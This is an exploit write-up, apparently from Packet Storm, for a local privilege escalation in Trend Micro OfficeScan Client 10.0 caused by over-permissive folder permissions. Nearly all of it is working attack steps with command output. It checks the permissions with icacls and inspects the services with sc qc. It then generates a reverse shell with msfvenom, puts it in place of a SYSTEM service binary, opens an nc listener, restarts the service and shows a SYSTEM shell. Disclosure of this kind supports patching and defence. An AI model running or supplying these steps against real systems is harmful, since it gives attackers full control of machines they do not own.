Share
## https://sploitus.com/exploit?id=PACKETSTORM:172513
# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE   
# Date: 2023/05/04   
# Exploit Author: msd0pe   
# Vendor Homepage: https://www.trendmicro.com   
# My Github: https://github.com/msd0pe-1   
  
  
Trend Micro OfficeScan Client:  
Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.  
  
[1] Verify the folder rights:  
> icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"  
  
C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)  
NT SERVICE\TrustedInstaller:(CI)(IO)(F)  
NT AUTHORITY\SYSTEM:(F)  
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)  
BUILTIN\Administrators:(F)  
BUILTIN\Administrators:(OI)(CI)(IO)(F)  
BUILTIN\Users:(F)  
BUILTIN\Users:(OI)(CI)(IO)(F)  
CREATOR OWNER:(OI)(CI)(IO)(F)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)  
  
[2] Get informations about the services:  
> sc qc tmlisten  
  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: tmlisten  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : OfficeScan NT Listener  
DEPENDENCIES : Netman  
: WinMgmt  
SERVICE_START_NAME : LocalSystem  
  
OR  
  
> sc qc ntrtscan  
  
SERVICE_NAME: ntrtscan  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : OfficeScan NT RealTime Scan  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
[3] Generate a reverse shell:  
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe  
  
OR  
  
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe  
  
[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe  
  
[5] Start listener  
> nc -lvp 4444  
  
[6] Reboot the service/server  
> sc stop tmlisten  
> sc start tmlisten  
  
OR  
  
> sc stop ntrtscan  
> sc start ntrtscan  
  
OR  
  
> shutdown /r  
  
[7] Enjoy !  
192.168.1.102: inverse host lookup failed: Unknown host  
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309  
Microsoft Windows [Version 10.0.19045.2130]  
(c) Microsoft Corporation. All rights reserved.  
  
C:\Windows\system32>whoami  
  
nt authority\system